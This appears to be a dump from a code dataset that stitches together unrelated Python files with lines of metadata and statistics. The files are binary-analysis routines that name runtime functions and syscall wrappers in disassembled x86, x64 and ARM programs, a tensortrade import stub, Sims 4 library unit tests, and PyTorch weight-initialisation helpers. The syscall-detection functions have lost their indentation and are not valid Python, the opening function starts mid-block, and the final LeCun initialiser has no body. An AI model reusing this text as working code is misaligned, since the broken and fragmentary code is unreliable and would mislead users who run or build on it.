                                    # TEST mode — confirm against upstream.
                                    if functions.binary.config.MODE == \
                                            functions.binary.config.TEST:
                                        main.name = 'main'
                                    main.train_name = 'main'
                                    main.test_name = 'main'
                                    main.is_name_given = True
                                    main.is_run_init = True
                                elif init_pc is None:
                                    init_pc = pc
                                    init = functions.get_function_by_lowpc(
                                        init_pc)
                                    init.name = '__libc_csu_init'
                                    init.train_name = '__libc_csu_init'
                                    init.test_name = '__libc_csu_init'
                                    init.is_name_given = True
                                    init.is_run_init = False
                                elif fini_pc is None:
                                    fini_pc = pc
                                    fini = functions.get_function_by_lowpc(
                                        fini_pc)
                                    fini.name = '__libc_csu_fini'
                                    fini.train_name = '__libc_csu_fini'
                                    fini.test_name = '__libc_csu_fini'
                                    fini.is_name_given = True
                                    fini.is_run_init = False
def x64_infer_functions(functions):
    """Name well-known runtime functions for x64 binaries.

    Same as the x86 variant except main/init/fini are found in the
    RDI/RCX/R8 argument registers of the __libc_start_main call.
    """
    if functions.binary.sections.has_sec(INIT):
        init_sec_addr = functions.binary.sections.get_sec(INIT).addr
        if functions.is_lowpc_function(init_sec_addr):
            _init = functions.get_function_by_lowpc(init_sec_addr)
            _init.name = '_init'
            _init.train_name = '_init'
            _init.test_name = '_init'
            _init.is_name_given = True
            _init.is_run_init = False
    if functions.binary.sections.has_sec(FINI):
        fini_sec_addr = functions.binary.sections.get_sec(FINI).addr
        if functions.is_lowpc_function(fini_sec_addr):
            _fini = functions.get_function_by_lowpc(fini_sec_addr)
            _fini.name = '_fini'
            _fini.train_name = '_fini'
            _fini.test_name = '_fini'
            _fini.is_name_given = True
            _fini.is_run_init = False
    if functions.is_lowpc_function(functions.binary.entry_point):
        _start = functions.get_function_by_lowpc(
            functions.binary.entry_point)
        _start.name = '_start'
        _start.train_name = '_start'
        _start.test_name = '_start'
        _start.is_name_given = True
        _start.is_run_init = False
        for blk_bap in _start.bap.blks:
            stmts = blk_bap.stmts
            for i in range(len(stmts) - 1, -1, -1):
                stmt = stmts[i]
                if isinstance(stmt, JmpStmt) \
                        and isinstance(stmt.kind, CallKind) \
                        and isinstance(stmt.kind.target, DirectLabel):
                    target_tid = stmt.kind.target.target_tid
                    called_f = functions.get_function_by_tid(target_tid)
                    if called_f is not None \
                            and called_f.name == '__libc_start_main' \
                            and i > 0:
                        main_pc = None
                        init_pc = None
                        fini_pc = None
                        for j in range(i - 2, -1, -1):
                            stmt = stmts[j]
                            if isinstance(stmt, DefStmt):
                                if isinstance(stmt.lhs, RegVar) \
                                        and isinstance(stmt.rhs, IntExp) \
                                        and functions.is_lowpc_function(
                                            stmt.rhs.value):
                                    if stmt.lhs.name == 'RDI' \
                                            and main_pc is None:
                                        main_pc = stmt.rhs.value
                                        main = \
                                            functions.get_function_by_lowpc(
                                                main_pc)
                                        # NOTE(review): MODE-check nesting
                                        # reconstructed; assuming only the
                                        # display name is TEST-mode-only.
                                        if functions.binary.config.MODE == \
                                                functions.binary.config.TEST:
                                            main.name = 'main'
                                        main.train_name = 'main'
                                        main.test_name = 'main'
                                        main.is_name_given = True
                                        main.is_run_init = True
                                    if stmt.lhs.name == 'RCX' \
                                            and init_pc is None:
                                        init_pc = stmt.rhs.value
                                        init = \
                                            functions.get_function_by_lowpc(
                                                init_pc)
                                        init.name = '__libc_csu_init'
                                        init.train_name = '__libc_csu_init'
                                        init.test_name = '__libc_csu_init'
                                        init.is_name_given = True
                                        init.is_run_init = False
                                    if stmt.lhs.name == 'R8' \
                                            and fini_pc is None:
                                        fini_pc = stmt.rhs.value
                                        fini = \
                                            functions.get_function_by_lowpc(
                                                fini_pc)
                                        fini.name = '__libc_csu_fini'
                                        fini.train_name = '__libc_csu_fini'
                                        fini.test_name = '__libc_csu_fini'
                                        fini.is_name_given = True
                                        fini.is_run_init = False
def arm_infer_functions(functions):
    """Name well-known runtime functions for ARM binaries.

    main is found in R0, __libc_csu_init in R3; __libc_csu_fini is either
    stored to memory directly or staged through a register first (the
    fini_reg tracking handles the two-step case).
    """
    if functions.binary.sections.has_sec(INIT):
        init_sec_addr = functions.binary.sections.get_sec(INIT).addr
        if functions.is_lowpc_function(init_sec_addr):
            _init = functions.get_function_by_lowpc(init_sec_addr)
            _init.name = '_init'
            _init.train_name = '_init'
            _init.test_name = '_init'
            _init.is_name_given = True
            _init.is_run_init = False
    if functions.binary.sections.has_sec(FINI):
        fini_sec_addr = functions.binary.sections.get_sec(FINI).addr
        if functions.is_lowpc_function(fini_sec_addr):
            _fini = functions.get_function_by_lowpc(fini_sec_addr)
            _fini.name = '_fini'
            _fini.train_name = '_fini'
            _fini.test_name = '_fini'
            _fini.is_name_given = True
            _fini.is_run_init = False
    if functions.is_lowpc_function(functions.binary.entry_point):
        _start = functions.get_function_by_lowpc(
            functions.binary.entry_point)
        _start.name = '_start'
        _start.train_name = '_start'
        _start.test_name = '_start'
        _start.is_name_given = True
        _start.is_run_init = False
        for blk_bap in _start.bap.blks:
            stmts = blk_bap.stmts
            for i in range(len(stmts) - 1, -1, -1):
                stmt = stmts[i]
                if isinstance(stmt, JmpStmt) \
                        and isinstance(stmt.kind, CallKind) \
                        and isinstance(stmt.kind.target, DirectLabel):
                    target_tid = stmt.kind.target.target_tid
                    called_f = functions.get_function_by_tid(target_tid)
                    if called_f is not None \
                            and called_f.name == '__libc_start_main' \
                            and i > 0:
                        main_pc = None
                        init_pc = None
                        fini_pc = None
                        fini_reg = None
                        for j in range(i - 2, -1, -1):
                            stmt = stmts[j]
                            if isinstance(stmt, DefStmt):
                                if isinstance(stmt.lhs, RegVar) \
                                        and stmt.lhs.name == 'R0' \
                                        and isinstance(stmt.rhs, IntExp) \
                                        and functions.is_lowpc_function(
                                            stmt.rhs.value) \
                                        and main_pc is None:
                                    main_pc = stmt.rhs.value
                                    main = functions.get_function_by_lowpc(
                                        main_pc)
                                    # NOTE(review): MODE-check nesting
                                    # reconstructed; assuming only the
                                    # display name is TEST-mode-only.
                                    if functions.binary.config.MODE == \
                                            functions.binary.config.TEST:
                                        main.name = 'main'
                                    main.train_name = 'main'
                                    main.test_name = 'main'
                                    main.is_name_given = True
                                    main.is_run_init = True
                                elif isinstance(stmt.lhs, RegVar) \
                                        and stmt.lhs.name == 'R3' \
                                        and isinstance(stmt.rhs, IntExp) \
                                        and functions.is_lowpc_function(
                                            stmt.rhs.value) \
                                        and init_pc is None:
                                    init_pc = stmt.rhs.value
                                    init = functions.get_function_by_lowpc(
                                        init_pc)
                                    init.name = '__libc_csu_init'
                                    init.train_name = '__libc_csu_init'
                                    init.test_name = '__libc_csu_init'
                                    init.is_name_given = True
                                    init.is_run_init = False
                                elif isinstance(stmt.lhs, MemVar) \
                                        and isinstance(stmt.rhs, StoreExp) \
                                        and isinstance(stmt.rhs.exp,
                                                       IntExp) \
                                        and functions.is_lowpc_function(
                                            stmt.rhs.exp.value) \
                                        and fini_pc is None:
                                    fini_pc = stmt.rhs.exp.value
                                    fini = functions.get_function_by_lowpc(
                                        fini_pc)
                                    fini.name = '__libc_csu_fini'
                                    fini.train_name = '__libc_csu_fini'
                                    fini.test_name = '__libc_csu_fini'
                                    fini.is_name_given = True
                                    fini.is_run_init = False
                                elif isinstance(stmt.lhs, MemVar) \
                                        and isinstance(stmt.rhs, StoreExp) \
                                        and isinstance(stmt.rhs.exp,
                                                       RegVar) \
                                        and fini_pc is None \
                                        and fini_reg is None:
                                    # Remember the register whose value was
                                    # stored; its defining constant is the
                                    # fini address.
                                    fini_reg = (stmt.rhs.exp.name,
                                                stmt.rhs.exp.index)
                                elif isinstance(stmt.lhs, RegVar) \
                                        and isinstance(stmt.rhs, IntExp) \
                                        and functions.is_lowpc_function(
                                            stmt.rhs.value) \
                                        and fini_pc is None \
                                        and fini_reg is not None \
                                        and fini_reg == (stmt.lhs.name,
                                                         stmt.lhs.index):
                                    fini_pc = stmt.rhs.value
                                    fini = functions.get_function_by_lowpc(
                                        fini_pc)
                                    fini.name = '__libc_csu_fini'
                                    fini.train_name = '__libc_csu_fini'
                                    fini.test_name = '__libc_csu_fini'
                                    fini.is_name_given = True
                                    fini.is_run_init = False
def infer_functions(functions):
    """Dispatch runtime-function naming by target architecture."""
    if functions.binary.config.MACHINE_ARCH == 'x86':
        x86_infer_functions(functions)
    elif functions.binary.config.MACHINE_ARCH == 'x64':
        x64_infer_functions(functions)
    elif functions.binary.config.MACHINE_ARCH == 'ARM':
        arm_infer_functions(functions)
def x86_temp_offsets(blk):
    """Register stack-slot temporaries touched by PUSH/POP/CALL/RET (x86)."""
    for stmt in blk.bap.stmts:
        if stmt.insn is not None \
                and (stmt.insn.startswith('PUSH')
                     or stmt.insn.startswith('POP')
                     or stmt.insn.startswith('CALL')
                     or stmt.insn.startswith('RET')):
            if isinstance(stmt, DefStmt) \
                    and type(stmt.rhs) in (LoadExp, StoreExp):
                base_pointer, offset, access = mem_addr(stmt.rhs.addr,
                                                        blk, stmt.pc)
                if base_pointer is not None \
                        and base_pointer.base_register == 'ESP':
                    make_temp_offset(base_pointer.base_register, offset,
                                     blk, stmt.pc)
            if isinstance(stmt, JmpStmt) \
                    and isinstance(stmt.kind, RetKind) \
                    and isinstance(stmt.kind.label, IndirectLabel):
                # NOTE(review): unlike the DefStmt case above, the whole
                # label expression (not .addr) is passed to mem_addr here —
                # preserved from the original; confirm intent.
                if isinstance(stmt.kind.label.exp, LoadExp):
                    base_pointer, offset, access = mem_addr(
                        stmt.kind.label.exp, blk, stmt.pc)
                    if base_pointer is not None \
                            and base_pointer.base_register == 'ESP':
                        make_temp_offset(base_pointer.base_register,
                                         offset, blk, stmt.pc)
                elif isinstance(stmt.kind.label.exp, VirtualExp) \
                        and isinstance(
                            get_virtual_exp(stmt.kind.label.exp, blk).exp,
                            LoadExp):
                    base_pointer, offset, access = mem_addr(
                        stmt.kind.label.exp, blk, stmt.pc)
                    if base_pointer is not None \
                            and base_pointer.base_register == 'ESP':
                        make_temp_offset(base_pointer.base_register,
                                         offset, blk, stmt.pc)


def x64_temp_offsets(blk):
    """Register stack-slot temporaries touched by PUSH/POP/CALL/RET (x64)."""
    for stmt in blk.bap.stmts:
        if stmt.insn is not None \
                and (stmt.insn.startswith('PUSH')
                     or stmt.insn.startswith('POP')
                     or stmt.insn.startswith('CALL')
                     or stmt.insn.startswith('RET')):
            if isinstance(stmt, DefStmt) \
                    and type(stmt.rhs) in (LoadExp, StoreExp):
                base_pointer, offset, access = mem_addr(stmt.rhs.addr,
                                                        blk, stmt.pc)
                if base_pointer is not None \
                        and base_pointer.base_register == 'RSP':
                    make_temp_offset(base_pointer.base_register, offset,
                                     blk, stmt.pc)
            if isinstance(stmt, JmpStmt) \
                    and isinstance(stmt.kind, RetKind) \
                    and isinstance(stmt.kind.label, IndirectLabel):
                if isinstance(stmt.kind.label.exp, LoadExp):
                    base_pointer, offset, access = mem_addr(
                        stmt.kind.label.exp, blk, stmt.pc)
                    if base_pointer is not None \
                            and base_pointer.base_register == 'RSP':
                        make_temp_offset(base_pointer.base_register,
                                         offset, blk, stmt.pc)
                elif isinstance(stmt.kind.label.exp, VirtualExp) \
                        and isinstance(
                            get_virtual_exp(stmt.kind.label.exp, blk).exp,
                            LoadExp):
                    base_pointer, offset, access = mem_addr(
                        stmt.kind.label.exp, blk, stmt.pc)
                    if base_pointer is not None \
                            and base_pointer.base_register == 'RSP':
                        make_temp_offset(base_pointer.base_register,
                                         offset, blk, stmt.pc)


def arm_temp_offsets(blk):
    """No implicit stack-touching instructions to handle on ARM."""
    pass


def temp_offsets(blk):
    """Dispatch temp-offset registration by target architecture."""
    if blk.binary.config.MACHINE_ARCH == 'x86':
        x86_temp_offsets(blk)
    elif blk.binary.config.MACHINE_ARCH == 'x64':
        x64_temp_offsets(blk)
    elif blk.binary.config.MACHINE_ARCH == 'ARM':
        arm_temp_offsets(blk)
def x86_syscalls(stmt, stmt_next, function):
if isinstance(stmt, DefStmt) \
and stmt.insn is not None \
and stmt.insn.startswith('MOV') \
and isinstance(stmt.lhs, RegVar) \
and stmt.lhs.name == 'EAX' \
and isinstance(stmt.rhs, IntExp) \
and stmt.rhs.value in function.binary.config.SYSCALL_TABLE \
and stmt.pc is not None \
and function.binary.insn_map.get_pc(stmt.pc) > stmt.pc:
syscall_value = stmt.rhs.value
if syscall_value == 0x66:
if isinstance(stmt_next, DefStmt) \
and stmt_next.insn is not None \
and stmt_next.insn.startswith('MOV') \
and isinstance(stmt_next.lhs, RegVar) \
and stmt_next.lhs.name == 'EBX' \
and isinstance(stmt_next.rhs, IntExp) \
and stmt_next.rhs.value in X86_SOCKETCALL_ARGS:
function.syscalls.add(0x66 * 100 + stmt_next.rhs.value)
else:
if function.binary.insn_map.get_insn(function.binary.insn_map.get_pc(stmt.pc)) == 'INT':
function.syscalls.add(syscall_value)
def x64_syscalls(stmt, function):
if isinstance(stmt, DefStmt) \
and stmt.insn is not None \
and stmt.insn.startswith('MOV') \
and isinstance(stmt.lhs, RegVar) \
and stmt.lhs.name == 'RAX' \
and isinstance(stmt.rhs, IntExp) \
and stmt.rhs.value in function.binary.config.SYSCALL_TABLE \
and stmt.pc is not None \
and function.binary.insn_map.get_pc(stmt.pc) > stmt.pc \
and function.binary.insn_map.get_insn(function.binary.insn_map.get_pc(stmt.pc)) == 'SYSCALL':
function.syscalls.add(stmt.rhs.value)
def arm_syscalls(stmt, function):
if isinstance(stmt, DefStmt) \
and stmt.insn is not None \
and stmt.insn.startswith('MOV') \
and isinstance(stmt.lhs, RegVar) \
and stmt.lhs.name == 'R7' \
and isinstance(stmt.rhs, IntExp) \
and stmt.rhs.value in function.binary.config.SYSCALL_TABLE \
and stmt.pc is not None \
and function.binary.insn_map.get_pc(stmt.pc) > stmt.pc \
and function.binary.insn_map.get_insn(function.binary.insn_map.get_pc(stmt.pc)) == 'SVC':
function.syscalls.add(stmt.rhs.value)
def syscalls(functions):
    """Detect syscall-wrapper functions and rename them after their syscall.

    Small functions (< 25 basic blocks) that are found to make exactly one
    syscall are renamed to the syscall's table entry, with a numeric suffix
    to keep names unique across the binary (existing non-``sub_`` names are
    counted first so renames never collide with them).
    """
    # Seed the name counter with all already-named (non-auto-generated) functions.
    name_counts = {}
    for function in functions.functions:
        if not function.name.startswith('sub_'):
            name_counts[function.name] = name_counts.get(function.name, 0) + 1
    for function in functions.functions:
        if len(function.bap.blks) >= 25:
            continue
        arch = function.binary.config.MACHINE_ARCH
        for blk in function.bap.blks:
            if arch == 'x86':
                # x86 needs statement pairs to resolve socketcall arguments.
                if len(blk.stmts) >= 2:
                    for stmt, stmt_next in zip(blk.stmts, blk.stmts[1:]):
                        x86_syscalls(stmt, stmt_next, function)
            elif arch == 'x64':
                for stmt in blk.stmts:
                    x64_syscalls(stmt, function)
            elif arch == 'ARM':
                for stmt in blk.stmts:
                    arm_syscalls(stmt, function)
        # Only rename unambiguous single-syscall wrappers.
        if len(function.syscalls) != 1:
            continue
        syscall_value = next(iter(function.syscalls))
        base_name = function.binary.config.SYSCALL_TABLE[syscall_value]
        name_counts[base_name] = name_counts.get(base_name, 0) + 1
        new_name = '{}_{}'.format(base_name, name_counts[base_name] - 1)
        function.is_name_given = True
        function.is_run_init = False
        function.name = new_name
        function.train_name = new_name
        function.test_name = new_name
| 49.837881
| 146
| 0.511417
| 3,473
| 31,049
| 4.325655
| 0.049525
| 0.071757
| 0.052054
| 0.022366
| 0.861679
| 0.842974
| 0.802303
| 0.792585
| 0.781934
| 0.729215
| 0
| 0.008431
| 0.404039
| 31,049
| 622
| 147
| 49.918006
| 0.803448
| 0.004123
| 0
| 0.703041
| 0
| 0
| 0.023578
| 0
| 0
| 0
| 0.000259
| 0
| 0
| 1
| 0.042934
| false
| 0.001789
| 0.014311
| 0
| 0.057245
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8dfcd0c6ffb177c5a90563ce31ed585be3b3923b
| 115
|
py
|
Python
|
tensortrade/strategies/__init__.py
|
ult-processor/tensortrade
|
c2848f3bc33295085c31b8ad774c6e12f23210ea
|
[
"Apache-2.0"
] | 1
|
2019-10-14T12:45:12.000Z
|
2019-10-14T12:45:12.000Z
|
tensortrade/strategies/__init__.py
|
plutusmens/tensortrade
|
16d1113621d435d0dfdd5eabbe3d7e4658f7178a
|
[
"Apache-2.0"
] | null | null | null |
tensortrade/strategies/__init__.py
|
plutusmens/tensortrade
|
16d1113621d435d0dfdd5eabbe3d7e4658f7178a
|
[
"Apache-2.0"
] | null | null | null |
from .trading_strategy import TradingStrategy
from .tensorforce_trading_strategy import TensorforceTradingStrategy
| 38.333333
| 68
| 0.913043
| 11
| 115
| 9.272727
| 0.636364
| 0.294118
| 0.411765
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.069565
| 115
| 2
| 69
| 57.5
| 0.953271
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
30b7d11624c9c01286ef624a969daff859f4e832
| 10,909
|
py
|
Python
|
Scripts/s4cl_tests/utils/common_collection_utils_tests.py
|
ColonolNutty/Sims4CommunityLibrary
|
684f28dc3c7deb4d9fd520e21e63942b65a91d31
|
[
"CC-BY-4.0"
] | 118
|
2019-08-31T04:33:18.000Z
|
2022-03-28T21:12:14.000Z
|
Scripts/s4cl_tests/utils/common_collection_utils_tests.py
|
ColonolNutty/Sims4CommunityLibrary
|
684f28dc3c7deb4d9fd520e21e63942b65a91d31
|
[
"CC-BY-4.0"
] | 15
|
2019-12-05T01:29:46.000Z
|
2022-02-18T17:13:46.000Z
|
Scripts/s4cl_tests/utils/common_collection_utils_tests.py
|
ColonolNutty/Sims4CommunityLibrary
|
684f28dc3c7deb4d9fd520e21e63942b65a91d31
|
[
"CC-BY-4.0"
] | 28
|
2019-09-07T04:11:05.000Z
|
2022-02-07T18:31:40.000Z
|
"""
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from pprint import pformat
from typing import List, Set, Tuple, Dict, Any
from sims4communitylib.modinfo import ModInfo
from sims4communitylib.utils.common_collection_utils import CommonCollectionUtils
from sims4communitylib.testing.common_assertion_utils import CommonAssertionUtils
from sims4communitylib.testing.common_test_service import CommonTestService
# noinspection PyMissingOrEmptyDocstring
@CommonTestService.test_class(ModInfo.get_identity())
class CommonCollectionUtilsTests:
    """Tests for CommonCollectionUtils: intersects, combinations, merge_dict.

    The four merge_dict tests share one input pair and differ only in the
    merge flags; the shared expectations live in _assert_merge_result, with
    the two flag-dependent values passed in explicitly.
    """

    @staticmethod
    def _assert_merge_result(result_dict, expected_a_value, expected_threes_count) -> None:
        """Shared assertions for the merge_dict tests.

        :param result_dict: The merged dictionary under test.
        :param expected_a_value: Value expected under key 'a'
            (5 when source values win, 1 when prefer_source_values=False).
        :param expected_threes_count: How many 3s 'test_coll' should hold
            (2 with duplicates allowed, 1 with allow_duplicates_in_collections=False).
        """
        message = pformat(result_dict)
        for expected_key in ('a', 'b', 'c', 'test_coll', 'test_other_coll'):
            CommonAssertionUtils.contains(result_dict, expected_key, message=message)
        CommonAssertionUtils.are_equal(result_dict['a'], expected_a_value, message=message)
        CommonAssertionUtils.are_equal(result_dict['b'], 2, message=message)
        CommonAssertionUtils.are_equal(result_dict['c'], 6, message=message)
        test_coll_val = result_dict['test_coll']
        for expected_entry in (1, 2, 3, 4, 5, 6):
            CommonAssertionUtils.contains(test_coll_val, expected_entry, message=message)
        count_of_test_val = sum(1 for val in test_coll_val if val == 3)
        CommonAssertionUtils.are_equal(count_of_test_val, expected_threes_count, message='The number of 3s were not correct! {}'.format(pformat(result_dict)))
        test_other_coll_val = result_dict['test_other_coll']
        CommonAssertionUtils.contains(test_other_coll_val, 24, message=message)
        CommonAssertionUtils.contains(test_other_coll_val, 25, message=message)

    @staticmethod
    @CommonTestService.test((1, 2, 3), (2,))
    @CommonTestService.test((1, 2, 3), (4,), (2,))
    @CommonTestService.test((1, 2, 3), (4, 7), (5, 6), (3,))
    def _should_intersect_true(list_one, *list_items) -> None:
        """intersects returns True when any collection shares an element."""
        result = CommonCollectionUtils.intersects(list_one, *list_items)
        CommonAssertionUtils.is_true(result)

    @staticmethod
    @CommonTestService.test((1, 2, 3), (4, 8))
    @CommonTestService.test((1, 2, 3), (5, 9,), (10, 4))
    def _should_intersect_false(list_one: List[int], *list_items: int) -> None:
        """intersects returns False when no collection shares an element."""
        result = CommonCollectionUtils.intersects(list_one, *list_items)
        CommonAssertionUtils.is_false(result)

    @staticmethod
    @CommonTestService.test([1, 2, 3], 2, {(1, 2), (1, 3), (2, 3)})
    def _should_combine(items: List[int], combination_length: int, expected_outcome: Set[Tuple[int]]) -> None:
        """create_possible_combinations yields all unordered pairs."""
        result = CommonCollectionUtils.create_possible_combinations(items, combination_length)
        CommonAssertionUtils.are_equal(result, expected_outcome)

    @staticmethod
    @CommonTestService.test({'a': 1, 'b': 2, 'test_coll': (1, 2, 3)}, {'a': 5, 'c': 6, 'test_coll': (3, 4, 5, 6), 'test_other_coll': (24, 25)})
    def _should_merge_dictionaries(dictionary_one: Dict[str, Any], dictionary_two: Dict[str, Any]) -> None:
        """Default merge: source values win, duplicates kept in collections."""
        result_dict = CommonCollectionUtils.merge_dict(dictionary_one, dictionary_two)
        CommonCollectionUtilsTests._assert_merge_result(result_dict, 5, 2)

    @staticmethod
    @CommonTestService.test({'a': 1, 'b': 2, 'test_coll': (1, 2, 3)}, {'a': 5, 'c': 6, 'test_coll': (3, 4, 5, 6), 'test_other_coll': (24, 25)})
    def _should_merge_dictionaries_allow_duplicates_false(dictionary_one: Dict[str, Any], dictionary_two: Dict[str, Any]) -> None:
        """allow_duplicates_in_collections=False de-duplicates merged collections."""
        result_dict = CommonCollectionUtils.merge_dict(dictionary_one, dictionary_two, allow_duplicates_in_collections=False)
        CommonCollectionUtilsTests._assert_merge_result(result_dict, 5, 1)

    @staticmethod
    @CommonTestService.test({'a': 1, 'b': 2, 'test_coll': (1, 2, 3)}, {'a': 5, 'c': 6, 'test_coll': (3, 4, 5, 6), 'test_other_coll': (24, 25)})
    def _should_merge_dictionaries_prefer_source_false(dictionary_one: Dict[str, Any], dictionary_two: Dict[str, Any]) -> None:
        """prefer_source_values=False keeps dictionary_one's value on key clashes."""
        result_dict = CommonCollectionUtils.merge_dict(dictionary_one, dictionary_two, prefer_source_values=False)
        CommonCollectionUtilsTests._assert_merge_result(result_dict, 1, 2)

    @staticmethod
    @CommonTestService.test({'a': 1, 'b': 2, 'test_coll': (1, 2, 3)}, {'a': 5, 'c': 6, 'test_coll': (3, 4, 5, 6), 'test_other_coll': (24, 25)})
    def _should_merge_dictionaries_prefer_source_false_allow_duplicates_false(dictionary_one: Dict[str, Any], dictionary_two: Dict[str, Any]) -> None:
        """Both flags off: first dict wins on clashes, collections de-duplicated."""
        result_dict = CommonCollectionUtils.merge_dict(dictionary_one, dictionary_two, prefer_source_values=False, allow_duplicates_in_collections=False)
        CommonCollectionUtilsTests._assert_merge_result(result_dict, 1, 1)
| 66.518293
| 153
| 0.731598
| 1,370
| 10,909
| 5.522628
| 0.083942
| 0.148031
| 0.152789
| 0.203013
| 0.885012
| 0.88184
| 0.881708
| 0.858842
| 0.858842
| 0.858842
| 0
| 0.020074
| 0.155193
| 10,909
| 163
| 154
| 66.92638
| 0.80089
| 0.026767
| 0
| 0.80137
| 0
| 0
| 0.048261
| 0
| 0
| 0
| 0
| 0
| 0.493151
| 1
| 0.047945
| false
| 0
| 0.041096
| 0
| 0.09589
| 0.006849
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
30bb0d29ea24672fa253627b23ef40d20610ae5a
| 4,873
|
py
|
Python
|
carla/agents/utils/weight_init.py
|
sebzap/CarlaRL
|
5283d15dee9e8dc5e728314d56875b4fbca3acb2
|
[
"MIT"
] | 6
|
2021-07-14T09:19:04.000Z
|
2022-01-18T07:59:20.000Z
|
carla/agents/utils/weight_init.py
|
sebzap/CarlaRL
|
5283d15dee9e8dc5e728314d56875b4fbca3acb2
|
[
"MIT"
] | null | null | null |
carla/agents/utils/weight_init.py
|
sebzap/CarlaRL
|
5283d15dee9e8dc5e728314d56875b4fbca3acb2
|
[
"MIT"
] | 1
|
2021-12-14T15:07:33.000Z
|
2021-12-14T15:07:33.000Z
|
"""
Created by Hamid Eghbal-zadeh at 19.11.20
Johannes Kepler University of Linz
"""
import torch.nn as nn
import math
import torch.nn.init as init
import torch
def weights_init_kaiming_normal(net):
    """Initialise *net*'s parameters in place with Kaiming-normal weights.

    Conv2d/Linear weights get ``kaiming_normal_`` (fan_out); their biases
    are zeroed (Conv2d bias only if present).  BatchNorm2d is set to
    weight=1, bias=0.  Recurrent layers (GRU/LSTM/RNN) get Kaiming-normal
    input-to-hidden and hidden-to-hidden weights and zeroed biases.
    """
    for module in net.modules():
        if isinstance(module, nn.Conv2d):
            init.kaiming_normal_(module.weight, mode='fan_out')
            if module.bias is not None:
                init.constant_(module.bias, 0)
        elif isinstance(module, nn.BatchNorm2d):
            init.constant_(module.weight, 1)
            init.constant_(module.bias, 0)
        elif isinstance(module, nn.Linear):
            init.kaiming_normal_(module.weight, mode='fan_out')
            init.constant_(module.bias, 0)
        elif type(module) in (nn.GRU, nn.LSTM, nn.RNN):
            for param_name, param in module.named_parameters():
                if 'weight_ih' in param_name or 'weight_hh' in param_name:
                    init.kaiming_normal_(param.data, mode='fan_out')
                elif 'bias' in param_name:
                    param.data.fill_(0)
def weights_init_kaiming_uniform(net):
    """Initialise *net*'s parameters in place with Kaiming-uniform weights.

    Mirrors weights_init_kaiming_normal but draws weights from the uniform
    variant: Conv2d/Linear weights via ``kaiming_uniform_`` (fan_out) with
    zeroed biases, BatchNorm2d weight=1/bias=0, and recurrent layer
    weights via ``kaiming_uniform_`` with zeroed biases.
    """
    for module in net.modules():
        if isinstance(module, nn.Conv2d):
            init.kaiming_uniform_(module.weight, mode='fan_out')
            if module.bias is not None:
                init.constant_(module.bias, 0)
        elif isinstance(module, nn.BatchNorm2d):
            init.constant_(module.weight, 1)
            init.constant_(module.bias, 0)
        elif isinstance(module, nn.Linear):
            init.kaiming_uniform_(module.weight, mode='fan_out')
            init.constant_(module.bias, 0)
        elif type(module) in (nn.GRU, nn.LSTM, nn.RNN):
            for param_name, param in module.named_parameters():
                if 'weight_ih' in param_name or 'weight_hh' in param_name:
                    init.kaiming_uniform_(param.data, mode='fan_out')
                elif 'bias' in param_name:
                    param.data.fill_(0)
def weights_init_xavier_with_nonlin(net, nonlin='relu'):
    """Initialise *net* in place with Xavier-uniform weights scaled for *nonlin*.

    Conv2d/Linear weights use ``xavier_uniform_`` with
    ``gain=calculate_gain(nonlin)``; biases are zeroed (Conv2d bias only
    if present).  BatchNorm2d is set to weight=1, bias=0.
    """
    # calculate_gain is pure, so compute it once outside the loop.
    gain = nn.init.calculate_gain(nonlin)
    for module in net.modules():
        if isinstance(module, nn.Conv2d):
            nn.init.xavier_uniform_(module.weight, gain=gain)
            if module.bias is not None:
                init.constant_(module.bias, 0)
        elif isinstance(module, nn.BatchNorm2d):
            init.constant_(module.weight, 1)
            init.constant_(module.bias, 0)
        elif isinstance(module, nn.Linear):
            nn.init.xavier_uniform_(module.weight, gain=gain)
            init.constant_(module.bias, 0)
def weights_init_xavier(module):
    """Xavier-uniform initialisation for a single module (e.g. via ``net.apply``).

    Conv2d weights get ``xavier_uniform_`` (gain 1.0) with a zeroed bias
    when present; BatchNorm2d is set to weight=1, bias=0; Linear only has
    its bias zeroed (the weight is deliberately left untouched, matching
    the original behavior).

    Fix: modules created without those parameters — ``Linear(..., bias=False)``
    or ``BatchNorm2d(..., affine=False)`` — previously raised AttributeError
    on ``None.data``; they are now skipped safely.
    """
    if isinstance(module, nn.Conv2d):
        init.xavier_uniform_(module.weight.data, 1.)
        if module.bias is not None:
            module.bias.data.zero_()
    elif isinstance(module, nn.BatchNorm2d):
        # affine=False leaves weight/bias as None.
        if module.weight is not None:
            module.weight.data.fill_(1)
        if module.bias is not None:
            module.bias.data.zero_()
    elif isinstance(module, nn.Linear):
        if module.bias is not None:
            module.bias.data.zero_()
def lecun_normal_(tensor):
    """In-place LeCun-normal init: N(0, 1/sqrt(fan_in)); returns *tensor*."""
    fan_in = init._calculate_correct_fan(tensor, 'fan_in')
    with torch.no_grad():
        return tensor.normal_(0, 1. / math.sqrt(fan_in))
def weights_init_lecun(net):
    """Initialise *net*'s parameters in place with LeCun-normal weights.

    Conv2d/Linear weights get lecun_normal_; biases are zeroed (Conv2d bias
    only if present).  BatchNorm2d is set to weight=1, bias=0.  Recurrent
    layers (GRU/LSTM/RNN) get LeCun-normal input-to-hidden and
    hidden-to-hidden weights and zeroed biases.
    """
